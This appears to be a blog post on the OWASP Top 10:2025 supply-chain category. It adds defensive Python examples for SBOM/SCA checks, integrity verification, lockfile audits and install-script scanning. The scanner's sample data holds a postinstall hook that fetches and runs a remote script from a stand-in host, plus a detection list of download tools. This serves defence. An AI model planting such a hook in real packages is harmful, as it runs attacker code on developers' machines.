Why OWASP Top 10 2025’s #3 Risk Demands Your Immediate Attention

In November 2025, the Open Web Application Security Project (OWASP) released its eighth edition of the Top 10 security risks, and the message is clear: software supply chain security has graduated from a niche concern to one of the most critical threats facing modern organizations. Ranked at position #3 with an alarming 5.19% incidence rate, Software Supply Chain Failures represents a paradigm shift in how we must approach application security.

The Wake-Up Call: Why Now?

The elevation of supply chain security to the #3 position isn’t arbitrary. It reflects the harsh reality of our interconnected software ecosystem. In the 2025 community survey, exactly 50% of respondents ranked supply chain failures as their #1 concern, making it the most voted risk category in OWASP history.

The stakes have never been higher. Recent attacks demonstrate the devastating potential:

  • Shai Hulud worm (September 2025): First successful self-replicating attack in the npm ecosystem, compromising 500+ packages and harvesting credentials from developer machines through malicious post-install scripts
  • GlassWorm attack (2025): Malicious VS Code marketplace extension deployed self-replicating code that harvested secrets from developer machines and emptied crypto wallets
  • SolarWinds compromise (2020): Affected over 18,000 organizations globally through compromised software updates

Understanding the Evolution

To understand why supply chain security has become so critical, we need to trace its evolution through OWASP’s Top 10 lists:

2013: The Beginning

A9 – Using Components with Known Vulnerabilities first appeared in 2013. At this stage, the focus was narrow: organizations simply needed to update libraries with known security flaws. The solution seemed straightforward: patch your dependencies.

2017: Maintaining Status

The risk persisted at A9:2017 - Using Components with Known Vulnerabilities, remaining in the same position. While the problem was recognized, the scope hadn’t expanded beyond vulnerable components.

2021: Broadening Scope

By 2021, the category evolved to A06:2021 - Vulnerable and Outdated Components. The name change reflected growing awareness that the problem wasn’t just about known vulnerabilities — outdated components, even without CVEs, posed significant risks.

2025: The Paradigm Shift

Now, in 2025, we have A03:2025 - Software Supply Chain Failures, which has jumped to position #3. This isn’t just a name change — it’s a fundamental reimagining of the threat. The scope now encompasses everything involved in building, distributing, and updating software:

  • Third-party dependencies and libraries
  • Build systems and CI/CD pipelines
  • Package repositories (npm, PyPI, Maven Central)
  • Developer tools and IDE extensions
  • Distribution infrastructure
  • Software update mechanisms

[Infographic: OWASP Top 10: Software Supply Chain Security Evolution, From Component Vulnerabilities to Software Supply Chain Failures (2013-2025). Timeline panel: 2013, position #9, A9: Using Components with Known Vulnerabilities (focus: patch your dependencies); 2017, position #9, A9 (unchanged scope); 2021, position #6, A06: Vulnerable and Outdated Components (not just CVEs); 2025, position #3, A03: Software Supply Chain Failures (50% voted #1 concern, 5.19% incidence rate, highest exploit score). Key Evolution panel: 2013-2017 narrow focus on CVEs and simple patching; 2021 outdated components and unmaintained libs; 2025 entire supply chain, CI/CD pipelines, build systems, developer tools, self-replicating attacks. Real-World Attacks panel: Shai Hulud (Sep 2025), GlassWorm (2025), SolarWinds (2020). 2025 Threat Scope panel: dependencies and libraries, build systems, CI/CD pipelines, package repositories, developer workstations, IDE extensions, distribution infrastructure, update mechanisms, entire build process. Source: OWASP Top 10:2025, https://owasp.org/Top10/]

Why This Matters to Your Organization

The Attack Surface Has Exploded

Modern applications are built on stacks of dependencies. A typical web application might have hundreds or thousands of direct and transitive dependencies. Each one represents a potential entry point for attackers.

“Despite the increased scope, supply chain failures continue to be a challenge to identify with only 11 Common Vulnerability and Exposures (CVEs) having the related CWEs.” — (OWASP Top 10:2025)

This detection challenge is precisely what makes supply chain attacks so dangerous. Traditional security tools struggle to identify these threats, yet they have the highest average exploit and impact scores from CVEs in the entire OWASP Top 10.

Developers Are Now Prime Targets

The GlassWorm attack demonstrated a terrifying evolution: attackers are now targeting developer workstations as entry points. By compromising developer tools and extensions, malicious actors gain access to trusted environments where traditional security controls are often relaxed.

Once a developer’s machine is compromised, the malware can:

  • Harvest credentials and API tokens
  • Inject malicious code into repositories
  • Propagate through CI/CD pipelines
  • Access production environments

The Trust Problem

Supply chain attacks exploit our fundamental need to trust external code. When you install a package from npm or PyPI, you’re implicitly trusting:

  • The package maintainer’s security practices
  • The integrity of the repository infrastructure
  • All transitive dependencies
  • The build and distribution pipeline

A compromise at any point in this chain can cascade throughout your entire application.

Taking Action: Protecting Your Supply Chain

OWASP’s recommendations for managing supply chain risk focus on visibility, verification, and vigilance:

1. Maintain Software Bill of Materials (SBOM)

Know exactly what’s in your software stack. An SBOM provides a comprehensive inventory of all components, including transitive dependencies. This visibility is crucial for rapid response when vulnerabilities are disclosed.

2. Implement Software Composition Analysis (SCA)

Use automated tools to continuously monitor your dependencies for:

  • Known vulnerabilities (CVEs)
  • Outdated or unmaintained components
  • License compliance issues
  • Suspicious package updates
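The two steps above (keep an SBOM, run SCA against it) fit together naturally: the SBOM is the inventory, and SCA is a match of that inventory against advisory data. The following is an added example, not code from the OWASP page or from any SCA product: it reads a constructed CycloneDX-style SBOM, builds the name-to-version inventory, and reports every component that falls inside an advisory's affected range. The package names, advisory identifiers, and version ranges are all constructed for the demo; a real tool would fetch advisories from a database such as OSV or NVD, and version comparison is simplified to dotted integers.

```python
# Added example (not from the OWASP page): inventory from a CycloneDX-style SBOM,
# then a minimal SCA pass against constructed advisories.
import json
from typing import Dict, List, Tuple

# Constructed SBOM in the CycloneDX JSON shape (components with name/version/purl).
SBOM_JSON = """
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.5",
  "components": [
    {"type": "library", "name": "demo-pad", "version": "1.3.0",
     "purl": "pkg:npm/demo-pad@1.3.0"},
    {"type": "library", "name": "demo-http", "version": "2.4.1",
     "purl": "pkg:npm/demo-http@2.4.1"},
    {"type": "library", "name": "demo-utils", "version": "0.9.2",
     "purl": "pkg:npm/demo-utils@0.9.2"},
    {"type": "library", "name": "demo-yaml", "version": "3.0.0",
     "purl": "pkg:npm/demo-yaml@3.0.0"}
  ]
}
"""

# Constructed advisories: a version is affected if introduced <= version < fixed.
# fixed = None means no patched release exists (the "unmaintained" case).
ADVISORIES = [
    {"id": "DEMO-2025-0001", "package": "demo-http", "introduced": "2.0.0",
     "fixed": "2.4.2", "summary": "request smuggling in header parser"},
    {"id": "DEMO-2025-0002", "package": "demo-utils", "introduced": "0.0.0",
     "fixed": None, "summary": "unmaintained; prototype pollution, no fix planned"},
    {"id": "DEMO-2024-0009", "package": "demo-yaml", "introduced": "1.0.0",
     "fixed": "2.2.0", "summary": "unsafe deserialization (fixed in 2.2.0)"},
]


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.4.1' -> (2, 4, 1); a pre-release suffix such as '-beta.1' is dropped."""
    core = text.split("-")[0]
    return tuple(int(part) for part in core.split("."))


def inventory(sbom_json: str) -> Dict[str, str]:
    """Map component name -> version; the SBOM already lists transitive deps."""
    sbom = json.loads(sbom_json)
    if sbom.get("bomFormat") != "CycloneDX":
        raise ValueError("not a CycloneDX document")
    return {c["name"]: c["version"] for c in sbom.get("components", [])}


def is_affected(version: str, advisory: dict) -> bool:
    """True when version lies in [introduced, fixed), or >= introduced with no fix."""
    v = parse_version(version)
    if v < parse_version(advisory["introduced"]):
        return False
    fixed = advisory["fixed"]
    return fixed is None or v < parse_version(fixed)


def find_vulnerable(sbom_json: str, advisories: list) -> List[Tuple[str, str, str]]:
    """Return (package, version, advisory id) for every affected component."""
    inv = inventory(sbom_json)
    hits = []
    for adv in advisories:
        version = inv.get(adv["package"])
        if version is not None and is_affected(version, adv):
            hits.append((adv["package"], version, adv["id"]))
    return hits


if __name__ == "__main__":
    for pkg, version, adv_id in find_vulnerable(SBOM_JSON, ADVISORIES):
        print(f"{pkg}@{version}: {adv_id}")
```

Running it flags demo-http (inside the affected range) and demo-utils (no fixed release exists), while demo-yaml 3.0.0 passes because it is past the fixed version; that second case is exactly the "outdated or unmaintained" finding that a CVE-only check would miss.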

3. Verify Package Integrity

Only obtain components from official, trusted sources over secure channels. Prefer signed packages to reduce the risk of including modified, malicious components. Verify checksums and signatures before use.
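As an added example of the "verify checksums before use" step (not code from the OWASP page or from npm itself), the block below checks a fetched artifact against the Subresource Integrity value that npm lockfiles record for each package (the "integrity" field, in the form sha512-<base64 digest>), and also computes a hex SHA-256 for comparison against a published checksum file. The tarball bytes and the lockfile entry are constructed for the demo; the check fails closed on a malformed or weak-algorithm integrity value rather than skipping verification.

```python
# Added example (not from the OWASP page): verifying a downloaded package
# against the SRI digest stored in a lockfile entry.
import base64
import hashlib
import hmac
from typing import Tuple

# Algorithms accepted for SRI values; sha1/md5 are deliberately excluded.
ALLOWED_ALGORITHMS = {"sha256", "sha384", "sha512"}


def parse_sri(integrity: str) -> Tuple[str, bytes]:
    """Split 'sha512-<base64>' into (algorithm, raw digest).

    Raises ValueError for malformed strings or weak/unknown algorithms so a
    bad lockfile entry is rejected instead of silently skipped.
    """
    algo, sep, b64 = integrity.partition("-")
    if not sep or algo not in ALLOWED_ALGORITHMS:
        raise ValueError(f"unsupported or malformed integrity value: {integrity!r}")
    try:
        digest = base64.b64decode(b64, validate=True)
    except ValueError as exc:
        raise ValueError(f"integrity value is not valid base64: {integrity!r}") from exc
    if len(digest) != hashlib.new(algo).digest_size:
        raise ValueError(f"digest length does not match {algo}")
    return algo, digest


def verify_sri(data: bytes, integrity: str) -> bool:
    """True only if data hashes to the digest recorded in integrity."""
    algo, expected = parse_sri(integrity)
    actual = hashlib.new(algo, data).digest()
    # Constant-time comparison; not strictly required for a public digest,
    # but a harmless habit for any value used as an authentication check.
    return hmac.compare_digest(actual, expected)


def sri_for(data: bytes, algo: str = "sha512") -> str:
    """The SRI string a lockfile would record for data (used to build the sample)."""
    if algo not in ALLOWED_ALGORITHMS:
        raise ValueError(f"refusing to emit weak algorithm {algo}")
    return f"{algo}-" + base64.b64encode(hashlib.new(algo, data).digest()).decode()


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256, for comparison with a checksum file published beside a release."""
    return hashlib.sha256(data).hexdigest()


# Constructed sample: a stand-in for a fetched tarball and its lockfile entry.
SAMPLE_TARBALL = b"constructed tarball bytes for demo-package@1.2.3"
LOCKFILE_ENTRY = {
    "version": "1.2.3",
    "resolved": "https://registry.npmjs.org/demo-package/-/demo-package-1.2.3.tgz",
    "integrity": sri_for(SAMPLE_TARBALL),
}


def check_download(data: bytes, entry: dict) -> str:
    """Decide whether a fetched artifact may be unpacked; returns a verdict string."""
    try:
        ok = verify_sri(data, entry["integrity"])
    except (KeyError, ValueError) as exc:
        return f"REJECT (bad lockfile entry: {exc})"
    return "OK" if ok else "REJECT (digest mismatch: artifact modified or substituted)"


if __name__ == "__main__":
    print(check_download(SAMPLE_TARBALL, LOCKFILE_ENTRY))
    print(check_download(SAMPLE_TARBALL + b"\n", LOCKFILE_ENTRY))
    print(check_download(SAMPLE_TARBALL, {"integrity": "sha1-AAAA"}))
```

A single appended byte changes the verdict to REJECT, and an entry that names sha1 is rejected before any hashing happens. Digest checks only prove the artifact matches what the lockfile recorded; they do not prove the recorded value came from the maintainer, which is what package signatures add on top.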

4. Secure Your CI/CD Pipeline

Your build infrastructure is now part of your attack surface. Treat CI/CD systems with the same rigor as production:

  • Implement strong access controls and authentication
  • Use separate credentials for different pipeline stages
  • Monitor and log all pipeline activities
  • Scan build artifacts for malware
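One concrete form of "scan build artifacts" that follows directly from the Shai Hulud case is to enumerate every installed package that declares an install-time lifecycle script, since that is the hook the worm used. The block below is an added example, not code from the OWASP page or from npm: it walks a node_modules tree (including @scope/name layouts), lists each package's preinstall/install/postinstall/prepare scripts, and marks for review any script that fetches or decodes remote content. The sample tree is constructed in a temporary directory; the marker list is a starting heuristic, not a complete malware signature.

```python
# Added example (not from the OWASP page): audit install-time lifecycle
# scripts across an installed node_modules tree.
import json
import os
import tempfile
from typing import Dict, List

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic markers for scripts that pull or decode content at install time.
NETWORK_MARKERS = ("curl ", "wget ", "http://", "https://", "Invoke-WebRequest", "base64")

# Constructed packages: a benign native build, a package with no install hooks,
# and a scoped package whose postinstall fetches and runs a remote script.
SAMPLE_PACKAGES = {
    "demo-native": {"name": "demo-native", "version": "1.0.0",
                    "scripts": {"install": "node-gyp rebuild"}},
    "demo-colors": {"name": "demo-colors", "version": "4.2.0",
                    "scripts": {"test": "jest"}},
    "@demo/telemetry": {"name": "@demo/telemetry", "version": "0.1.7",
                        "scripts": {"postinstall":
                                    "curl https://example.invalid/setup.sh -o setup.sh && sh setup.sh"}},
}


def _looks_network_bound(command: str) -> bool:
    return any(marker in command for marker in NETWORK_MARKERS)


def _package_dirs(node_modules: str):
    """Yield package directories, descending one level into @scope folders."""
    for entry in sorted(os.listdir(node_modules)):
        path = os.path.join(node_modules, entry)
        if not os.path.isdir(path):
            continue
        if entry.startswith("@"):
            for inner in sorted(os.listdir(path)):
                inner_path = os.path.join(path, inner)
                if os.path.isdir(inner_path):
                    yield inner_path
        else:
            yield path


def scan_lifecycle_scripts(node_modules: str) -> List[Dict[str, object]]:
    """Report every package that declares an install-time hook."""
    findings = []
    for pkg_dir in _package_dirs(node_modules):
        manifest = os.path.join(pkg_dir, "package.json")
        if not os.path.isfile(manifest):
            continue
        with open(manifest, encoding="utf-8") as fh:
            try:
                meta = json.load(fh)
            except json.JSONDecodeError:
                findings.append({"package": os.path.relpath(pkg_dir, node_modules),
                                 "error": "unparseable package.json"})
                continue
        hooks = {h: cmd for h, cmd in meta.get("scripts", {}).items() if h in LIFECYCLE_HOOKS}
        if hooks:
            findings.append({
                "package": f"{meta.get('name', '?')}@{meta.get('version', '?')}",
                "hooks": hooks,
                "needs_review": any(_looks_network_bound(cmd) for cmd in hooks.values()),
            })
    return findings


def build_sample_tree(root: str) -> str:
    """Write the constructed packages under root/node_modules and return that path."""
    node_modules = os.path.join(root, "node_modules")
    for name, meta in SAMPLE_PACKAGES.items():
        pkg_dir = os.path.join(node_modules, *name.split("/"))
        os.makedirs(pkg_dir, exist_ok=True)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(meta, fh)
    return node_modules


def demo() -> List[Dict[str, object]]:
    """Build the sample tree in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        return scan_lifecycle_scripts(build_sample_tree(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

In practice this runs in CI after install (or, better, installs are done with scripts disabled and the report decides which packages are allowed to run them). The scan is ordered so that scoped packages come first; demo-colors does not appear at all because its only script is a test hook.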

5. Harden Developer Workstations

Given that developers are now prime targets, secure their environments:

  • Restrict and monitor IDE extension installations
  • Implement endpoint detection and response (EDR) solutions
  • Use separate accounts for development and browsing
  • Regularly scan for compromised credentials

6. Adopt Dependency Management Best Practices

  • Pin dependency versions instead of using version ranges
  • Review and test updates before deploying
  • Monitor for suspicious update patterns
  • Consider using private package mirrors
  • Implement virtual patches when direct updates aren’t possible
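Three of the practices above (pin versions, prefer a private mirror, and keep the integrity data that makes verification possible) can be checked mechanically from an npm manifest and its lockfile. The following is an added example, not code from the OWASP page or from npm: it reports dependencies declared with a range or tag instead of an exact version, lockfile entries that carry no integrity value, and packages resolved from a host outside an allow-list of approved registries. The manifest, lockfile, hostnames, and integrity placeholders are all constructed for the demo.

```python
# Added example (not from the OWASP page): lockfile hygiene checks for
# pinning, integrity coverage, and approved package sources.
import json
import re
from typing import Dict, List
from urllib.parse import urlparse

# Constructed manifest: one exact pin, four specifiers that float.
PACKAGE_JSON = """
{
  "name": "demo-app",
  "dependencies": {
    "demo-http": "2.4.1",
    "demo-utils": "^0.9.0",
    "demo-yaml": "~3.0.0",
    "demo-logger": ">=1.0.0 <2.0.0",
    "demo-cli": "latest"
  }
}
"""

# Constructed lockfile in the v2/v3 shape ("packages" keyed by node_modules path).
# The integrity values are placeholders, not real digests.
PACKAGE_LOCK = """
{
  "name": "demo-app",
  "lockfileVersion": 3,
  "packages": {
    "": {"name": "demo-app"},
    "node_modules/demo-http": {
      "version": "2.4.1",
      "resolved": "https://npm.mirror.example.internal/demo-http/-/demo-http-2.4.1.tgz",
      "integrity": "sha512-constructedA"
    },
    "node_modules/demo-utils": {
      "version": "0.9.2",
      "resolved": "https://registry.npmjs.org/demo-utils/-/demo-utils-0.9.2.tgz",
      "integrity": "sha512-constructedB"
    },
    "node_modules/demo-yaml": {
      "version": "3.0.0",
      "resolved": "https://registry.npmjs.org/demo-yaml/-/demo-yaml-3.0.0.tgz"
    },
    "node_modules/demo-logger": {
      "version": "1.4.0",
      "resolved": "https://cdn.example.test/demo-logger-1.4.0.tgz",
      "integrity": "sha512-constructedC"
    }
  }
}
"""

# Constructed allow-list: the public registry plus the organisation's mirror.
TRUSTED_REGISTRY_HOSTS = {"registry.npmjs.org", "npm.mirror.example.internal"}

# An exact pin is three dotted integers, optionally with a pre-release tag.
EXACT_PIN = re.compile(r"^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?$")


def unpinned(package_json: str) -> Dict[str, str]:
    """Dependencies whose specifier is a range or tag rather than an exact version."""
    deps = json.loads(package_json).get("dependencies", {})
    return {name: spec for name, spec in deps.items() if not EXACT_PIN.match(spec)}


def missing_integrity(package_lock: str) -> List[str]:
    """Lockfile entries with no integrity value (nothing to verify a download against)."""
    packages = json.loads(package_lock).get("packages", {})
    return [path for path, entry in packages.items() if path and "integrity" not in entry]


def untrusted_sources(package_lock: str, trusted_hosts=TRUSTED_REGISTRY_HOSTS) -> Dict[str, str]:
    """Lockfile entries resolved from a host outside the allow-list."""
    packages = json.loads(package_lock).get("packages", {})
    findings = {}
    for path, entry in packages.items():
        resolved = entry.get("resolved")
        if not resolved:
            continue
        if urlparse(resolved).hostname not in trusted_hosts:
            findings[path] = resolved
    return findings


def audit(package_json: str, package_lock: str) -> Dict[str, object]:
    """Combine the three checks into one report suitable for a CI gate."""
    return {
        "unpinned": unpinned(package_json),
        "missing_integrity": missing_integrity(package_lock),
        "untrusted_sources": untrusted_sources(package_lock),
    }


if __name__ == "__main__":
    print(json.dumps(audit(PACKAGE_JSON, PACKAGE_LOCK), indent=2))
```

Any non-empty finding is a reasonable reason to fail the build: a floating specifier means the next install can silently pick up a newly published (possibly compromised) release, a missing integrity value means the artifact cannot be verified, and an unexpected host means the package bypassed the mirror and whatever scanning sits in front of it.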

The Bottom Line

The elevation of Software Supply Chain Failures to position #3 in the OWASP Top 10 isn’t just a ranking — it’s a call to action. The attacks are real, the consequences are severe, and the threat is only growing.

With the highest incidence rate (5.19%) and the highest average exploit and impact scores, supply chain failures represent a perfect storm of prevalence, difficulty to detect, and potential damage. Organizations that treat this as just another checkbox security item do so at their peril.

The message from OWASP is clear: supply chain security is no longer optional. It’s not a future problem — it’s a right now problem that demands immediate, sustained attention.

What’s Next?

Start by conducting a supply chain risk assessment for your organization:

  1. Inventory all dependencies across your applications
  2. Identify critical components and high-risk dependencies
  3. Assess your current visibility and monitoring capabilities
  4. Evaluate your CI/CD pipeline security
  5. Review developer workstation security policies
  6. Implement continuous monitoring and alerting

The full OWASP Top 10:2025 is available at https://owasp.org/Top10/.


The software supply chain has become one of the most critical battlegrounds in cybersecurity. The question isn’t whether your organization will be targeted — it’s whether you’ll be prepared when it happens.


Feel free to contact me with any suggestions and feedback. I would really appreciate them.

Thank you for reading!